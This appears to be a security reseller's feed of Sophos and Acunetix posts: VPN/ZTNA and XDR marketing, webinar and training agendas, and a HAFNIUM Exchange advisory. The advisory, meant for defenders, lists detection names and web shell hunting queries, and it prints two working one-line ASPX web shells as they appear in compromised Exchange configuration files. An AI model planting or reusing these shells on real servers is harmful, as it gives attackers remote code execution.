There’s no argument that the pandemic has driven a massive increase in remote working. During May 2020, 62% of employed Americans were working from home (WFH), up from just 7% pre-COVID.

However, remote working was already a trend even before COVID, and many in-office employees were already transitioning to working from home a few days a week. In the UK, remote working climbed at a rate of 74% in the last decade, while in Australia, about a third of the workforce was regularly WFH.

At the same time, cyber attackers preyed on those remote workers, using them as back doors, gaining multiple entry points and penetrating organizations quickly.

Securing employees in any location

Remote working is a win-win for companies and staff. Employees save commuting time and costs while enjoying added flexibility and greater productivity. Meanwhile, organizations reduced operational costs and turnover rates.

But for IT teams, long-term remote working creates additional security challenges. Whether employees are logging in from their living rooms, visiting a customer location, or sipping coffee at a Wi-Fi hotspot, your network and data must remain protected at all times.

With Sophos, your users can quickly, efficiently, and securely connect and work from anywhere. We offer both traditional VPN-based and zero-trust network access (ZTNA) options.

Sophos VPN

The vast majority of remote workers right now are connecting to the main office and cloud-based resources (SaaS or Public Cloud) via VPN. At Sophos, we have a long history of enabling secure remote VPN connections with Sophos Firewall. In fact, we have two options:

1. The first is Sophos Connect, a free, easy-to-use VPN client that you run on your devices. Simple to deploy and configure, Sophos Connect gives your remote users secure access to resources on the corporate network or public cloud from Windows and macOS devices. It’s also hugely popular, and we currently have over 1.4 million active clients.

2. There’s also SD-RED, a plug-and-play remote ethernet device that connects branch offices, remote sites, and individuals to the main network (physical or cloud). It’s the ultimate in small/home office protection with always-on dedicated or split-tunnel VPN that’s easy to deploy and manage with various flexible options. It’s also very portable – about the size of an old DVD player – making it ideal for anyone who needs to access a secure connection at any time and from any location.

Sophos ZTNA: The Future of Secure Connectivity

Many organizations are asking for more than VPN was ever designed to deliver, which is where Sophos Zero Trust Network Access (ZTNA), our new remote access solution, comes in. As the name implies, ZTNA eliminates the concept of implicit trust in an individual based on their presence on the network alone.

Sophos ZTNA, is a great alternative to VPN, enabling users to connect to corporate resources from any location in a straightforward and transparent way. At the same time, it elevates protection and minimizes the risk of lateral movement within the network by continually assessing identity and device health before allowing access.

Sophos ZTNA makes sure the device is enrolled, up-to-date, properly protected, and has encryption automatically enabled. It then uses that information to make decisions based on customizable policies to determine user access and privilege to your critical networked applications.

Sophos ZTNA protects any networked application, whether hosted on a company’s on-premises network, in the public cloud or any other hosting site. It provides coverage for everything from Remote Desktop Protocol (RDP) access to network file shares to applications like Jira, wiki’s, source code repositories, support and ticketing apps, and more.

Sophos ZTNA has three major components:

1. The ZTNA client is installed on users’ devices, providing a transparent user experience that integrates device health and user identity. It’s easy to deploy, alongside our Intercept X endpoint, effectively deploying as a single agent for customers using both of our products. But it can also work with any endpoint solution. It supports Windows initially, with Mac and mobile device support to follow.

2. Sophos Central is your cloud management platform for all things Sophos, including Sophos ZTNA. Use Sophos Central for deployment, to set granular policy controls over who can access what apps under what conditions, and for insightful reporting.

3. The ZTNA Gateway is software- and VM-based for public cloud and virtual environment deployments on-premise. It continuously verifies and validates user identity and device health to provide secure access to apps and data based on policy, and shares log and event data back to Sophos Central. Users can also log into the ZTNA gateway to easily see and launch all the apps they are authorized to access.

For more information on Sophos ZTNA and to join the early access program visit www.sophos.com/ztna.

Source: Sophos

Sophos customers are protected from the exploitation of the new zero-day vulnerabilities affecting Microsoft Exchange.

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

• Troj/WebShel-L
• Troj/WebShel-M
• Troj/WebShel-N
• Troj/ASPDoor-T
• Troj/ASPDoor-U
• Troj/ASPDoor-V
• Troj/AspScChk-A
• Troj/Bckdr-RXD
• Troj/WebShel-O (alert in progress)
• Troj/WebShel-P (alert in progress)

Other payloads

• Mal/Chopper-A
• ATK/Pivot-B
• AMSI/PowerCat-A (Powercat)
• AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:inetpubwwwrootaspnet_client%' OR path LIKE 'C:inetpubwwwrootaspnet_clientsystem_web%' OR path LIKE 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');

/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:inetpubwwwrootaspnet_client%' OR path LIKE 'C:inetpubwwwrootaspnet_clientsystem_web%' OR path LIKE 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth%');

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:

• Troj/Ransom-GFE
• CryptoGuard

Source: Sophos

[vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615285616081{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_single_image media=”100251″ media_width_percent=”100″ alignment=”center” shape=”img-round” media_link=”url:http%3A%2F%2Fbit.ly%2FMSP-DAY-2021||target:%20_blank|”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100507″ media_width_percent=”100″ alignment=”center” css_animation=”zoom-in” title=”Datto & Sophos MSP Innovation Day Webinar”][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615289893788{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_column_text]

During our MSP Innovation Day event we:

Discovered how Datto and Sophos integrated solutions can help us improve productivity and automation, and ensure security across all levels.

Learned valuable information on how to protect our business’s and our client’s assets.

Gained insight on ways to grow our trade by becoming more skilled at operations and at acquiring industry knowledge, achieving an advantage in today’s competitive markets.

[/vc_column_text][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615293945822{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_separator sep_color=”color-210407″][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615290563545{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/2″][vc_single_image media=”99810″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Datto is the leading global provider of IT solutions delivered through managed service providers (MSPs). Datto is more than just a technology provider. It helps you implement and sell solutions that help you grow.

Datto Autotask PSA allows MSPs to run all aspects of their business at peak efficiency. It combines all the mission-critical tools necessary to run a managed services business. Autotask PSA centralizes operations and enables you to make quick data-driven decisions with customizable dashboards and widgets, and provides a real-time view of what’s happening from every angle.

• Maximize Uptime With a Secure, Cloud Platform

• Centralize Operations to Increase Efficiency

• Enable Data-Driven Decisions

• PSA Software Tailored to You

[/vc_column_text][/vc_column][vc_column width=”1/2″][vc_single_image media=”99822″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Sophos is a leader in next-generation endpoint and network security. As the pioneer of synchronized security Sophos develops its innovative portfolio of endpoint, network, encryption, web, email, and mobile security solutions to work better together.

All products that are deployed as part of the MSP Connect Flex program through Sophos Central will be included in the Datto Autotask PSA integration, including Intercept X, Disk Encryption, Endpoint, Mobile, Web, Email, Wireless, and Cloud Optix.

• Sophos Central will automatically create all products in Autotask PSA

• Sophos will automatically update the service contract nightly to provide up-to-date billing information on all Sophos products deployed across an MSP’s customer base

• The integration will provide ongoing, real-time data to Autotask PSA

• The integration additionally supports manual syncs to Autotask PSA

[/vc_column_text][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615305977241{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}”][vc_column column_width_percent=”100″ gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”1/1″ css=”.vc_custom_1615305968976{border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_custom_heading text_color=”color-210407″ separator=”yes” css_animation=”alpha-anim”]

Agenda

[/vc_custom_heading][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615305190480{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column column_width_percent=”100″ gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”1/1″ css=”.vc_custom_1615305935095{border-top-width: 0px !important;padding-top: 0px !important;}”][vc_column_text css=”.vc_custom_1617855544520{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}”]

11:00 OPENING & WELCOMING
George Kouimintzis, Commercial Director, NSS

11:10 DATTO COMPANY PRESENTATION
Joao Caires, Sales Director, Datto RoE

11:20 DATTO RMM – REMOTE MONITORING & MANAGEMENT
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:35 DATTO PSA – PROFESSIONAL SERVICES AUTOMATION
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:50 SOPHOS MSP PROGRAM
Andreas Buttler, Channel Account Manager, MSP, Sophos

12:05 SOPHOS CENTRAL CLOUD BASED SECURITY
Grzegorz Nocon, System Engineer, Sophos

12:15 BUSINESS BENEFITS OF DATTO & SOPHOS INTEGRATION WITH DEMO
George Kouimintzis, Commercial Director, NSS

12:30 CDMA SUCCESS STORY OF DATTO & SOPHOS INTEGRATION
Michael Nicolaou, Senior Network & Security Consultant, CDMA

12:45 NSS, A ONE-STOP-SHOP DISTI FOR MSPS
George F. Kapaniris, Executive Director, NSS

13:00 A REWARDING GAME OF KNOWLEDGE
Panos Kazanelis, Digital Marketing Manager, NSS

13:10 Q&A

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_empty_space empty_h=”2″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_custom_heading]

Feel free to contact us for any additional information

[/vc_custom_heading][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][contact-form-7 id=”100237″ title=”Feel free to contact us for any additional information”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_empty_space empty_h=”2″][/vc_column][/vc_row]

[vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615285616081{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_single_image media=”100251″ media_width_percent=”100″ alignment=”center” shape=”img-round” media_link=”url:http%3A%2F%2Fbit.ly%2FMSP-DAY-2021||target:%20_blank|”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”100507″ media_width_percent=”65″ media_ratio=”sixteen-nine” alignment=”center” shape=”img-round” shadow=”yes” shadow_weight=”std” css_animation=”zoom-in” title=”Datto & Sophos MSP Innovation Day Webinar”][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615289893788{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_custom_heading heading_semantic=”h1″ text_weight=”300″ separator=”yes”]During our MSP Innovation Day event we:[/vc_custom_heading][vc_column_text]

• Discovered how Datto and Sophos integrated solutions can help us improve productivity and automation, and ensure security across all levels.

• Learned valuable information on how to protect our business’s and our client’s assets.

• Gained insight on ways to grow our trade by becoming more skilled at operations and at acquiring industry knowledge, achieving an advantage in today’s competitive markets.

[/vc_column_text][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615293945822{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_separator sep_color=”color-210407″][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1615290563545{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/2″][vc_single_image media=”99810″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Datto is the leading global provider of IT solutions delivered through managed service providers (MSPs). Datto is more than just a technology provider. It helps you implement and sell solutions that help you grow.

Datto Autotask PSA allows MSPs to run all aspects of their business at peak efficiency. It combines all the mission-critical tools necessary to run a managed services business. Autotask PSA centralizes operations and enables you to make quick data-driven decisions with customizable dashboards and widgets, and provides a real-time view of what’s happening from every angle.

• Maximize Uptime With a Secure, Cloud Platform

• Centralize Operations to Increase Efficiency

• Enable Data-Driven Decisions

• PSA Software Tailored to You

[/vc_column_text][/vc_column][vc_column width=”1/2″][vc_single_image media=”99822″ media_width_percent=”60″ alignment=”center”][vc_column_text]

Sophos is a leader in next-generation endpoint and network security. As the pioneer of synchronized security Sophos develops its innovative portfolio of endpoint, network, encryption, web, email, and mobile security solutions to work better together.

All products that are deployed as part of the MSP Connect Flex program through Sophos Central will be included in the Datto Autotask PSA integration, including Intercept X, Disk Encryption, Endpoint, Mobile, Web, Email, Wireless, and Cloud Optix.

• Sophos Central will automatically create all products in Autotask PSA

• Sophos will automatically update the service contract nightly to provide up-to-date billing information on all Sophos products deployed across an MSP’s customer base

• The integration will provide ongoing, real-time data to Autotask PSA

• The integration additionally supports manual syncs to Autotask PSA

[/vc_column_text][/vc_column][/vc_row][vc_row row_height_percent=”0″ back_color=”color-uydo” overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1651769721611{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}” shape_dividers=””][vc_column column_width_percent=”100″ gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”1/1″ css=”.vc_custom_1615305968976{border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}”][vc_custom_heading text_color=”color-210407″ separator=”yes” css_animation=”alpha-anim”]

Agenda

[/vc_custom_heading][/vc_column][/vc_row][vc_row row_height_percent=”0″ back_color=”color-gyho” overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1651769700436{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” shape_dividers=””][vc_column column_width_percent=”100″ gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”1/1″ css=”.vc_custom_1615305935095{border-top-width: 0px !important;padding-top: 0px !important;}”][vc_column_text css=”.vc_custom_1617855544520{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}”]

11:00 OPENING & WELCOMING
George Kouimintzis, Commercial Director, NSS

11:10 DATTO COMPANY PRESENTATION
Joao Caires, Sales Director, Datto RoE

11:20 DATTO RMM – REMOTE MONITORING & MANAGEMENT
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:35 DATTO PSA – PROFESSIONAL SERVICES AUTOMATION
Toby Rudkin, Senior Sales Engineer at Datto EMEA, Datto

11:50 SOPHOS MSP PROGRAM
Andreas Buttler, Channel Account Manager, MSP, Sophos

12:05 SOPHOS CENTRAL CLOUD BASED SECURITY
Grzegorz Nocon, System Engineer, Sophos

12:15 BUSINESS BENEFITS OF DATTO & SOPHOS INTEGRATION WITH DEMO
George Kouimintzis, Commercial Director, NSS

12:30 CDMA SUCCESS STORY OF DATTO & SOPHOS INTEGRATION
Michael Nicolaou, Senior Network & Security Consultant, CDMA

12:45 NSS, A ONE-STOP-SHOP DISTI FOR MSPS
George F. Kapaniris, Executive Director, NSS

13:00 A REWARDING GAME OF KNOWLEDGE
Panos Kazanelis, Digital Marketing Manager, NSS

13:10 Q&A

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_empty_space empty_h=”2″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_custom_heading]

Feel free to contact us for any additional information

[/vc_custom_heading][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][contact-form-7 id=”100237″ title=”Feel free to contact us for any additional information”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_empty_space empty_h=”2″][/vc_column][/vc_row]

With the immense popularity of open-source software such as Linux, WordPress, or Magento, you might wonder why the situation is so different in the world of web application security. Let’s try to compare open-source vulnerability scanners with commercial solutions and it will soon be clear why businesses shy away from open-source web application security tools.

Open-Source and IT Security

A lot of popular IT security software is distributed using open-source licenses. Most penetration testing tools such as nmap or Wireshark are open-source. There are also advanced solutions such as the Snort IPS/IDS and the OpenVAS network vulnerability scanner (an offshoot of Nessus). So why is it different in the case of web application security?

The quality of open-source web application security tools lags behind commercial products. While there are small businesses that say that open-source tools are enough for them, even they tend to change their mind when they grow.

Here are some of the reasons why open-source web application security tools cannot measure up to professional solutions such as Acunetix.

Reason 1. Ease of Use

When the first web security scanners appeared, they were meant to be used manually to perform vulnerability tests. They were intended for security experts – penetration testers, security researchers, etc. Therefore, ease of use was never a very important factor because experts understand web application security well enough to figure out how to get the most out of the software. This trend still prevails with manual tools.

In time, the intended audience for web vulnerability scanners shifted. People without deep security knowledge also needed them, for example, system administrators that were tasked with handling security in smaller businesses, DevOps administrators setting up agile SLDCs, or even developers themselves. Why not just security personnel? For one simple reason – security needs are growing so fast that there aren’t enough security professionals to hire. There’s a major cybersecurity skill gap, which is expected only to worsen with time. Therefore, more and more security tasks have to go to people who have less training and who rely on good automated tools.

Unfortunately, the development of open-source tools did not follow this trend. Open-source web vulnerability scanners remained rather difficult to use, similar to many other open-source tools.

Reason 2. More than Vulnerability Scanning

Open-source web application security tools are, by design, just vulnerability scanners. However, businesses need much more than pointing a tool at a web server and getting a list of vulnerabilities. You cannot fix all vulnerabilities at once – a business must know which vulnerabilities should be given priority because they pose a bigger security risk. You also need to manage the process of fixing and rechecking.

Professional web application security tools such as Acunetix are not just scanners – they are also vulnerability management and vulnerability assessment tools. They assess vulnerability severity so that you start by fixing important issues like SQL injections or cross-site scripting and only then spend time on non-critical misconfigurations. They also provide both built-in issue management and out-of-the-box integrations with popular issue trackers such as Jira.

Reason 3. Keeping Up with Growth

The third reason why open-source web application security tools are not a good fit for businesses is related to the rapid development of web application security. A business cannot afford to wait until open-source project teams find some time to add new vulnerability classes, new functionalities, or support for new web frameworks. The importance of web application security grows fast – simply because more and more businesses move from on-premises solutions to virtual environments (the cloud). This also means that criminals are very interested in keeping up with the latest developments and finding new ways to take advantage of vulnerabilities.

Software vendors that are fully focused on web application security, such as Invicti, have a unique advantage: they can fully focus on keeping up with web technologies and trends. This is not only an advantage over open-source tools but also over other commercial providers. Many web security tool vendors focus primarily on network security scanners, which are all about signatures and patching, and shy away from the complexities of modern web application security. They simply cannot keep up. Acunetix can.

Reason 4. Hidden Costs of Open-Source

Many businesses that work with open-source tools know very well that there are certain hidden costs associated with free software. In software, free means no help and no support, except for community support. For example, businesses that choose the Linux operating system to replace Windows often subscribe to third-party support programs. This makes free software no longer free and, in the long run, often more expensive than commercial alternatives.

Of course, the need for support is different for different software classes. A simple word processor might not need as much support as a complex IT security solution. Due to their nature, web vulnerability scanners may need some support with initial configuration issues and even more support if you intend to automate tasks and integrate the tools with your current environments.

Without support, open-source web vulnerability tools are just manual pen testing tools for security researchers – they help identify security threats and that’s where the story ends.

Reason 5. False Positives in a Vulnerability Scanner

False positives are the biggest pain point of web application security. This is because web application security mostly deals with custom code. If you have a false positive identified by a network vulnerability test, this does not affect your developers and usually just means that the patches you apply to software or network devices are not critical. In a web application security scenario, you can either double-check every vulnerability found using a scanner and consume the resources of the pen testing team or you can risk that the developers will be hunting ghosts, trying to fix a problem that does not exist.

That is why one of the most important criteria for selecting a web security scanner is how it handles false positives. If the scanner can, in some way, prove that the vulnerability exists, it means that the issue can go straight to the developer for a fix – there’s no need for manual confirmation. Open-source scanners (and several commercial products, too) don’t have such capabilities. Every reported issue is just a potential vulnerability, not a real one. On the other hand, Acunetix can mark the vulnerability as 100% confirmed and in many cases provide you with proof such as a copy of sensitive data that should not be accessible.

Worse still, the problem of false positives does not just grow linearly with the number of web applications and the development of your business. The bigger your business and the more applications you have, the worse the impact of false positives on your resources. So if you’re looking towards the future, you simply cannot afford to use a tool that will hinder your growth, such as a basic, manual, open-source web security scanner.

Can You Afford Free?

Open-source software is a great starting point if you’re a learner, an independent researcher, or a small start-up (for example, if you have less than 5 web applications in total). However, if you intend to grow, sooner or later you will notice that open-source software is no longer enough and even if it identifies web security vulnerabilities, it cannot help you fix them. And, ultimately, the goal of web application security isn’t to point out vulnerabilities but to eliminate them.

Source: Acunetix

This course is designed for technical professionals who will be administering Sophos SG UTM and provides the skills necessary to manage common day-to-day tasks. The course is available either online or as an instructor-led classroom course. It consists of presentations and practical lab exercises to reinforce the taught content, and electronic copies of the supporting documents for the course will be provided to each trainee through the online portal.

Sophos UTM Administrator Course (Tuesday 6 April 2021– Wednesday 7 April 2021)

Objectives

On completion of this course, trainees will be able to:

• Recognize the main technical capabilities and how they protect against threats
• Complete common configuration tasks
• Backup and restore the system
• Complete common day-to-day tasks
• View and manage logs and reports

Prerequisites

There are no prerequisites for this course; however it is recommended that trainees should:

• Have networking knowledge equivalent to CompTIA N+ or better
• Be familiar with security best practices
• Be able to setup a Windows server
• Have experience of configuring and managing network gateway devices
• Have knowledge of general Windows networking and Microsoft Active Directory

If you are uncertain whether you meet the necessary prerequisites to take this course, please email us at globaltraining@sophos.com and we will be happy to help.

Certification

To become a Sophos Certified Administrator, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80%, and is limited to 4 attempts.

Location: NSS training center (broadcast via webex)

Duration: 1 1/2 days 

Lab Environment

Each student will be provided with a pre-configured environment which simulates a company network with two sites, a head office and a branch office and contains Windows Servers and two SG UTMs. 

Agenda

Trainer: Michael Eleftheroglou

Day 1 Tuesday 6 April 2021 

9:30-10:00 Module 1: Security Threats and how the UTM Protects Against Them 

10:00-11:00 Module 2: Getting Started with UTM Firewall

11:00-12:00  Labs 

Configure a UTM using the Setup Wizard

• Navigate the WebAdmin
• Configure system settings
• Create definitions
• Configure interfaces and routing
  

12:00-12:45 Lunch

12:45-13:10  Module 3: Network Protection

13:10-14:00  Labs 

• Create firewall rules
• Configure NATing
• Demonstrate Advanced Threat Protection
• Configure Intrusion Prevention (IPS)
  

14:00-14:35  Module 4: Site-to-Site Connections

14:35-15:00  Labs

• Configure an SSL site-to-site VPN
• Configure an IPsec site-to-site VPN

15:00-15:35 Module 5: Authentication  

15:35:16:15 Labs 

• Configure local authentication and the User Portal
• Configure external authentication using Active Directory
• Enable one-time passwords
• Configure Active Directory SSO for web filtering

16:15-17:00  Module 6: Web Protection and Application Control

Day 2  Wednesday 7 April 2021 

9:30-11:00 Labs 

• Deploy the HTTPS CA certificate
• Configure Filter Actions
• Sophos Certified Administrator
• Manage Websites
• Configure Web Policies
• Configure Web Profiles
• Configure Application Control

11:00-11:35 Module 7 Email Protection

11:35-13:00 Labs

• Enable and configure quarantine digests
• Configure an Email Protection Policy for MTA mode
• Encrypt emails that match a Data Control List using SPX
• Manage quarantined items as a user

13:00-13:45 Lunch

13:45-14:15 Module 8 Wireless and Remote Access

14:15-14:40 Labs

• Configure an SSL remote access VPN
• Configure the HTML5 VPN Portal

14:40-15:10 Module 9 Endpoint Protection and Mobile Control 

15:10-15:40 Module 10 Logging, Reporting and Troubleshooting

15:40-16:10 Labs

• Run, customize and schedule reports
• View and manage log files
• Use built-in support tools
• Further

We are pleased to announce that powerful new Extended Detection and Response (XDR) and Endpoint Detection and Response (EDR) features for Intercept X are now available in early access.

The early-access program (EAP) gives you the power to pull in network data sources in addition to those from endpoints and servers, enabling an even more holistic view of your organization’s cybersecurity environment. It also brings the ability to get critical information from your devices even when they are offline.

Sophos Data Lake

The Sophos Data Lake is a key component of both EDR and XDR functionality. It stores critical information from Intercept X, Intercept X for Server, and XG Firewall in the cloud, both enabling cross-product investigations and the ability to get key information from devices even when they are offline.

For example: look back 30 days for unusual activity on a device that has been destroyed or taken without authorization. Join the EAP to start using it.

Sophos XDR – Extended Detection and Response

Sophos XDR goes beyond the endpoint and server by integrating important network data, building up an in-depth picture of potential threats across your organization’s estate. If you’re already using Intercept X and XG Firewall you just need to join the EAP and you’ll get access to rich cross-product data in one convenient location.

Don’t worry if you don’t have both: you can start a free trial and then join the EAP as normal.

Note: Intercept X and XG Firewall are required to enable the network cross-product functionality. Trying out the cloud storage and offline device capabilities of the Sophos Data Lake just requires joining the EAP; XG Firewall is not required.

Here are just a few Sophos XDR use cases:

• Compare indicators of compromise from multiple data sources to quickly understand a suspected attack
• Use ATP and IPS detections from XG Firewall to investigate suspect hosts
• Identify unmanaged and unprotected devices across an organization’s estate
• Understand why the office network connection is slow and which app is causing the traffic

How to join the early access program

The EAP is open to everyone that has Intercept X and Intercept X for Server; you don’t need to have EDR. Please note: MSP Flex customers are not eligible to join.

For full instructions on joining and getting started, please head over to the Sophos community forums. We’d love to hear what you think!

Source: Sophos

The amount, complexity, and relevance of the data that companies handle has increased exponentially. Today the data stored by organizations can contain information from buying and selling transactions, market analysis, ideas for future technological innovations, customer or employee information (salaries, health information) and more.

As a consequence, confidential information has become one of the most valuable assets of organizations and today, more than ever, it is necessary that it be protected throughout its life cycle without this altering the pace of the business.

In 2020, with the rise of remote work caused by the COVID-19 quarantine, many companies have been exposed more to security incidents and cases of hacks have continued to rise. With the new year just beginning, it’s a good time to consider what you can do to ensure your data is protected and your business is not the victim of a data breach.

Here are 10 tips to keep in mind to protect your company information in 2021:

1. Replace FTP Scripts

